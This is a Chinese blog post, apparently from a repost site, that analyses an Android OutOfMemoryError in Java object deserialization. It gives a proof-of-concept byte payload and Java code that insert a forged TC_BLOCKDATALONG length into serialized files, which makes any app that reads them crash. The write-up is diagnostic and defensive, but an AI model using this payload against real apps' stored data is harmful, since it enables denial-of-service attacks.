Android安全攻击——对象序列化OOM问题
来源:互联网 发布:未闻花名网络歌手歌词 编辑:程序博客网 时间:2024/06/06 04:38
前言
最近在项目中使用ObjectInputStream/ObjectOutputStream进行对象的序列化和反序列化,出现了OOM的问题,在解决的过程中简单的研究了一下对象的序列化和反序列化(使用Serializable接口)的过程,简单做一个记录。发现了一个持久化存储序列化数据的安全风险,可能会受到恶意攻击,导致必现的OOM。
使用场景
1 数据使用方案
持久化过程:应用在使用过程中,首先使用ObjectOutputStream的writeObject接口将对象序列化成byte数据,然后利用加密算法对序列化数据进行加密,最终将加密后的数据持久化存储到应用的数据目录下的某个文件中。
读取解析过程:首先将数据从文件中读取出来,然后用对应的解密算法解密,最后使用对应的ObjectInputStream的readObject接口将字节流解析成对应的对象。
2 遇到的问题
上述方案在使用的过程中,遇到以下两种OOM的崩溃
(1) OOM 1
java.lang.OutOfMemoryError: Failed to allocate a 942137073 byte allocation with 4194240 free bytes and 487MB until OOMat java.io.ObjectInputStream.readBlockDataLong(ObjectInputStream.java:569)at java.io.ObjectInputStream.readContent(ObjectInputStream.java:699)at java.io.ObjectInputStream.discardData(ObjectInputStream.java:636)at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1662)at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:657)at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1782)at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
(2) OOM 2
java.lang.OutOfMemoryError: Failed to allocate a 789137073 byte allocation with 2317152 free bytes and 456MB until OOM at java.io.DataInputStream.decodeUTF at java.io.DataInputStream.decodeUTF at java.io.ObjectInputStream.readContent(ObjectInputStream.java:699) at java.io.ObjectInputStream.discardData(ObjectInputStream.java:636) at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1662) at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:657) at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1782) at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761) at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983) at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
堆栈里面大致的意思是,在用ObjectInputStream的readObject接口进行对象的反序列化的时候,需要分配900M+/700M+的内存,导致上层出现OOM,众所周知,应用java层能够分配的最大内存由系统属性dalvik.vm.heapsize定义,这个值根据不同的厂商和机器都有可能是不一样的,我手上的测试机配如下:
该机器的heapsize设置为256M,也就是该机器的每个应用虚拟机能够分配的最大内存即为256M,当虚拟机需要的内存超过256M时,会出现OutOfMemoryError的问题,这边顺便记录一下,很多人用Exception去捕获所有的异常,但是这样并不能捕获OutOfMemoryError,看一下继承关系:
由继承关系可知,OutOfMemoryError是继承自Error,和Exception并不是一个继承分支,因此想要捕获包括Error在内的所有异常,必须使用Throwable去捕获。
3 分析问题
3.1 堆栈分析
上述两个OOM实际上出现的原因是一样的,下面使用OOM1来着重分析这个问题,也就是最终调用ObjectInputStream.readBlockDataLong出现的OOM问题,先看一下这个函数:
/** * Reads and returns an array of raw bytes with primitive data. The array * will have up to 255 bytes. The primitive data will be in the format * described by {@code DataOutputStream}. * * @return The primitive data read, as raw bytes * * @throws IOException * If an IO exception happened when reading the primitive data. */ private byte[] readBlockData() throws IOException { byte[] result = new byte[input.readByte() & 0xff]; input.readFully(result); return result; } /** * Reads and returns an array of raw bytes with primitive data. The array * will have more than 255 bytes. The primitive data will be in the format * described by {@code DataOutputStream}. * * @return The primitive data read, as raw bytes * * @throws IOException * If an IO exception happened when reading the primitive data. */ private byte[] readBlockDataLong() throws IOException { byte[] result = new byte[input.readInt()]; input.readFully(result); return result; }上面贴出来了两个函数,readBlockData和readBlockDataLong函数,从函数名称分析,这两个函数的功能应该是类似的,readBlockDataLong函数像是用于读取较大数据量的数据,看一下注释,readBlockData函数用于读取数据量小于等于255的数据块,readBlockDataLong函数用于读取数据量大于255的数据块。
继续向上看堆栈,里面调用到了ObjectInputStream.readContent函数,看一下这个函数:
/** * Reads the content of the receiver based on the previously read token * {@code tc}. * * @param tc * The token code for the next item in the stream * @return the object read from the stream * * @throws IOException * If an IO exception happened when reading the class * descriptor. * @throws ClassNotFoundException * If the class corresponding to the object being read could not * be found. */ private Object readContent(byte tc) throws ClassNotFoundException, IOException { switch (tc) { case TC_BLOCKDATA: return readBlockData(); case TC_BLOCKDATALONG: return readBlockDataLong(); case TC_CLASSDESC: return readNewClassDesc(false); case TC_OBJECT: return readNewObject(false); case TC_LONGSTRING: return readNewLongString(false); case TC_EXCEPTION: Exception exc = readException(); throw new WriteAbortedException("Read an exception", exc); case TC_RESET: resetState(); return null; default: throw corruptStream(tc); } }
这个函数是根据不同的tc(这里面认为是token),决定以不同的格式读取tc后面的数据,这个不禁让人想起利用ObjectInputStream/ObjectOutputStream进行序列化和反序列化时应该有一个特定的格式,或者说是标准,于是google了一下,找到了Serialize进行序列化的标准,见:
Grammar for the Stream Format
该标准定义了Serialize序列化时每个部分写入时的顺序以及对应的tc,本文重点分析问题,不重点讲解Serialize序列化的格式标准,有兴趣的同学可以自己参照标准研究一下。上面的OOM问题也就大致能定位原因了:反序列化的数据中包含了TC_BLOCKDATALONG 的token,导致在进行反序列化的时候走到了readBlockDataLong函数中,再往上一层堆栈走,看一下ObjectInputStream.readNewClassDesc和ObjectInputStream.discardData函数:
/** * Reads a new class descriptor from the receiver. It is assumed the class * descriptor has not been read yet (not a cyclic reference). Return the * class descriptor read. * * @param unshared * read the object unshared * @return The {@code ObjectStreamClass} read from the stream. * * @throws IOException * If an IO exception happened when reading the class * descriptor. * @throws ClassNotFoundException * If a class for one of the objects could not be found */ private ObjectStreamClass readNewClassDesc(boolean unshared) throws ClassNotFoundException, IOException { ObjectStreamClass newClassDesc = readClassDescriptor(); registerObjectRead(newClassDesc, descriptorHandle, unshared); descriptorHandle = oldHandle; primitiveData = emptyStream; //load class... // Consume unread class annotation data and TC_ENDBLOCKDATA discardData(); checkedSetSuperClassDesc(newClassDesc, readClassDesc()); return newClassDesc; } /** * Reads and discards block data and objects until TC_ENDBLOCKDATA is found. * * @throws IOException * If an IO exception happened when reading the optional class * annotation. * @throws ClassNotFoundException * If the class corresponding to the class descriptor could not * be found. */ private void discardData() throws ClassNotFoundException, IOException { primitiveData = emptyStream; boolean resolve = mustResolve; mustResolve = false; do { byte tc = nextTC(); if (tc == TC_ENDBLOCKDATA) { mustResolve = resolve; return; // End of annotation } readContent(tc); } while (true); }看一下ObjectInputStream.readNewClassDesc函数注释,结合相关的代码,大概可以知道该函数的主要功能是读取序列化数据中class的描述,并用classloader将对应的class加载上来,然后调用discardData函数,看一下这个函数调用上面的注释,读取和消费不需要的数据,可能是一些注解annotation数据,直到读到TC_ENDBLOCKDATA为止。看一下TC_ENDBLOCKDATA的定义:
/** * Tag to mark a long block of data. The long following this tag * indicates the size of the block. */ public static final byte TC_BLOCKDATALONG = (byte) 0x7A;这个tc代表的后面的数据块将是一个较大的数据块,tc后面的int型数据(4个字节组成)代表的是这个数据块的数据长度。
进一步的,导致问题的原因可以总结为:利用ObjectInputStream.readObject接口进行对象的反序列化时,读取完class的相关数据,利用classloader加载完该class后,ObjectInputStream.discardData函数会尝试消耗掉反序列化时不需要的TC_ENDBLOCKDATA数据,在读取后面的4字节组成的数据长度后,调用readBlockDataLong函数创建一个int型大小的byte数组时,出现了OOM。
3.2 TC_ENDBLOCKDATA异常数据分析
要看TC_ENDBLOCKDATA数据正常情况下什么时候会被写入,要从序列化的流程ObjectOutputStream函数中查找线索,在ObjectOutputStream.java中搜索TC_ENDBLOCKDATA,看到TC_ENDBLOCKDATA仅在函数drain中被使用到,看一下该函数:
/** * Writes buffered data to the target stream. This is similar to {@code * flush} but the flush is not propagated to the target stream. * * @throws IOException * if an error occurs while writing to the target stream. */ protected void drain() throws IOException { if (primitiveTypes == null || primitiveTypesBuffer == null) { return; } // If we got here we have a Stream previously created int offset = 0; byte[] written = primitiveTypesBuffer.toByteArray(); // Normalize the primitive data while (offset < written.length) { int toWrite = written.length - offset > 1024 ? 1024 : written.length - offset; if (toWrite < 256) { output.writeByte(TC_BLOCKDATA); output.writeByte((byte) toWrite); } else { output.writeByte(TC_BLOCKDATALONG); output.writeInt(toWrite); } // write primitive types we had and the marker of end-of-buffer output.write(written, offset, toWrite); offset += toWrite; } // and now we're clean to a state where we can write an object primitiveTypes = null; primitiveTypesBuffer = null; }
分析一下该函数可知,TC_BLOCKDATALONG标记和后面int型的长度字段是一起被写入到output流中的,再看上面的长度最大不会超过1024,当数据量较大时,整个数据块被分成多个大小为1024字节的TC_BLOCKDATALONG数据库写入到output流中,也就是说正常情况下,系统中TC_BLOCKDATALONG后面的长度字段不可能超过1024,因此,可以得出结论,上述出现OOM的过程中应该是最终用来进行反序列化的数据本身是有问题的,进一步的,极有可能是在数据存储、数据解密的过程中出现的问题。
3.3 异常复现
经过上述分析可知,最终进行反序列的数据有问题,导致OOM,顺着这个思路,直接看一下ObjectInputStream.writeClassDesc函数:
/** * Write a class descriptor {@code classDesc} (an * {@code ObjectStreamClass}) to the stream. * * @param classDesc * The class descriptor (an {@code ObjectStreamClass}) to * be dumped * @param unshared * Write the object unshared * @return the handle assigned to the class descriptor * * @throws IOException * If an IO exception happened when writing the class * descriptor. */ private int writeClassDesc(ObjectStreamClass classDesc, boolean unshared) throws IOException { if (classDesc == null) { writeNull(); return -1; } output.writeByte(TC_CLASSDESC); writeClassDescriptor(classDesc); annotateClass(classToWrite); drain(); // flush primitive types in the annotation output.writeByte(TC_ENDBLOCKDATA); writeClassDesc(classDesc.getSuperclass(), unshared); return handle; } /** * Writes optional information for class {@code aClass} to the output * stream. This optional data can be read when deserializing the class * descriptor (ObjectStreamClass) for this class from an input stream. By * default, no extra data is saved. * * @param aClass * the class to annotate. * @throws IOException * if an error occurs while writing to the target stream. * @see ObjectInputStream#resolveClass(ObjectStreamClass) */ protected void annotateClass(Class<?> aClass) throws IOException { // By default no extra info is saved. Subclasses can override }
看下这个函数,里面调用writeClassDescriptor函数将class的描述写入到output中,然后调用annotateClass函数,接着写入TC_ENDBLOCKDATA,作为class描述的结束符,上面的ObjectInputStream.readNewClassDesc函数在读出class的描述后,会调用discardData函数,这个函数会检查在class的描述后面是否存在对应的tc。
根据这个思路可以继承ObjectInputStream函数,并在annotateClass函数中写入(TC_BLOCKDATALONG, 数据长度),当写入的数据长度较大时,会出现必现的OOM,代码如下:
import android.util.Log;import java.io.DataOutputStream;import java.io.IOException;import java.io.ObjectOutputStream;import java.io.OutputStream;import java.lang.reflect.Field;public class AnObjectOutputStream extends ObjectOutputStream { private static final String TAG = "AnObjectOutputStream"; /** * 复现堆栈java.io.ObjectInputStream.readBlockDataLong * 默认复现这个堆栈 */ private static byte[] DISCARD_BYTES_LONG_DATA = new byte[] { 0x7a, 0x7a, 0x7a, 0x67, 0x67 }; /** * 复现堆栈 java.io.DataInputStream.decodeUTF * java.io.DataInputStream.decodeUTF * java.io.ObjectInputStream.readNewLongString */ private static byte[] DISCARD_BYTES_LONG_STRING = new byte[] { 0x7c, 0x7a, 0x7a, 0x67, 0x67 }; private DataOutputStream mInnerOutput; private boolean mStackBlockData = true; public AnObjectOutputStream(OutputStream input) throws IOException { super(input); } /** * 调用setStackBlockData(false),将复现下面的堆栈 * 复现堆栈 java.io.DataInputStream.decodeUTF * java.io.DataInputStream.decodeUTF * java.io.ObjectInputStream.readNewLongString */ public void setStackBlockData(boolean blockData) { mStackBlockData = blockData; } protected void annotateClass(Class<?> aClass) throws IOException { // By default no extra info is saved. Subclasses can override Log.i(TAG, "annotateClass aClass:" + aClass); installOutputStream(); if (mInnerOutput == null) { return; } if (mStackBlockData) { mInnerOutput.write(DISCARD_BYTES_LONG_DATA); } else { mInnerOutput.write(DISCARD_BYTES_LONG_STRING); } Log.i(TAG, "annotateClass write success"); } private void installOutputStream() { Object obj = null; try { Field field = getClass().getSuperclass().getDeclaredField("output"); field.setAccessible(true); obj = field.get(this); } catch (Exception e) { e.printStackTrace(); } if (obj == null) { Log.i(TAG, "installOutputStream failed"); return; } mInnerOutput = (DataOutputStream)obj; }}由于ObjectOutputStream中的output成员属性为private,因此需要借助反射。果然,使用AnObjectOutputStream替代常规的ObjectOutputStream,运行一下必现的OOM,完整的调用如下:
import com.example.testpopupwindow.stream.AnObjectOutputStream;import java.io.ByteArrayInputStream;import java.io.ByteArrayOutputStream;import java.io.IOException;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.io.Serializable;public class SerializeThread extends Thread { private static final String TAG = "SerializeThread"; private Employee mEmployee; public void run() { mEmployee = Employee.create("test"); Object obj = null; try { byte[] serializeRes = serialize(); obj = unserialize(serializeRes); } catch (IOException e) { e.printStackTrace(); } } private byte[] serialize() throws IOException { ByteArrayOutputStream arrOs = new ByteArrayOutputStream(); ObjectOutputStream oos = new AnObjectOutputStream(arrOs); oos.writeObject(mEmployee); oos.flush(); byte[] outArr = arrOs.toByteArray(); oos.close(); return outArr; } private Object unserialize(byte[] serializedata) throws IOException { ByteArrayInputStream byteArrayInputStream = null; ObjectInputStream objectInputStream = null; try { byteArrayInputStream = new ByteArrayInputStream(serializedata); objectInputStream = new ObjectInputStream(byteArrayInputStream); return objectInputStream.readObject(); } catch (Exception e) { } return null; } /** * test error.... */ public static class Employee implements Serializable { String mName; /** * test error.... */ private Employee(String name) { mName = name; } public String toString() { return "Employee mName:" + mName; } public static Employee create(String name) { return new Employee(name); } }}
只要调用new SerializeThread().start(),即会出现下面的OOM堆栈:
3.4 安全问题
由上面的OOM问题,引出来一个ObjectInputStream/ObjectOutputStream实现Serialize序列化的安全问题,使用默认的ObjectOutputStream方式生成序列化数据,保存在本地后,如果被恶意在指定位置写入类似上述的字段,会导致应用在利用被修改后的序列化数据进行反序列化时,出现必现的崩溃。假设上述Employee在被序列化后生成的文件16进制数据如下:
插入的代码如下:
private byte[] mDiscardBytes = new byte[] { 0x7a, 0x7a, 0x7a, 0x67, 0x67 }; private byte[] modifyBlockDataSize(byte[] content) { for (int i=0; i<content.length; i++) { if (content[i] == (byte)0x78) { return insertLongBlockData(content, i); } } return null; } private byte[] insertLongBlockData(byte[] data, int insertPos) { byte[] newArray = new byte[data.length + mDiscardBytes.length]; System.arraycopy(data, 0, newArray, 0, insertPos); System.arraycopy(mDiscardBytes, 0, newArray, insertPos, mDiscardBytes.length); System.arraycopy(data, insertPos, newArray, insertPos + mDiscardBytes.length, data.length - insertPos); return newArray; }经过这个处理以后,得出的序列化数据如下:
被圈出来的部分为插入的数据,经过上述插入后,反序列化以后会造成应用必现的OOM崩溃。
至于上面为什么要判断0x78,这个要参考一下ObjectInputStream.writeClassDesc和ObjectInputStream.readNewClassDesc函数,readNewClassDesc在读取完class的描述信息后,会尝试调用discardData方法读以TC_ENDBLOCKDATA(0x78)结尾之类的annoation之类的信息,而在discardData方法中会触发检查和读取TC_BLOCKDATALONG或者TC_LONGSTRING,因此只要在0x78前面插入一段TC_BLOCKDATALONG或者TC_LONGSTRING的tc和长度数据即可。
3.5 总结
(2)使用ObjectInputStream/ObjectOutputStream存在一定的安全风险,注意最起码要对序列化以后的数据进行加密
(3)在ObjectInputStream进行反序列化的时候,要用Throwable捕获包括error在内的所有异常,以便捕获OOM后继续运行
0 0
- Android安全攻击——对象序列化OOM问题
- Android—对象序列化
- Android—OOM原理
- Android—序列化对象—Parcelable
- Android问题—Bitmap引起的OOM问题的解决办法
- Android 开发问题 —— 加载大图、多图后程序OOM
- 对象序列化问题
- android小问题:Bundle传递对象 序列化问题
- android OOM问题经验
- Android OOM问题排查
- Android OOM 问题整理
- android对象序列化
- android 对象序列化
- android 对象序列化
- Android 对象序列化
- Android对象序列化
- android对象序列化
- Android对象序列化
- js隐式转换:递增和递减操作符
- mysql 根据汉字首字母排序
- Excel与XML相互转换
- Log4net配置与使用简要说明
- Day21 整合Hibernate和Spring
- Android安全攻击——对象序列化OOM问题
- <HDU2018>母牛的故事
- The content of element type "session-factory" must match "(property*,mapping*,(class-cache| c
- Android面试题
- VMware安装全过程
- WebRTC QoS
- 重拾 Java(一): 对象
- 浅谈Java设计模式
- 以Json形式上传数据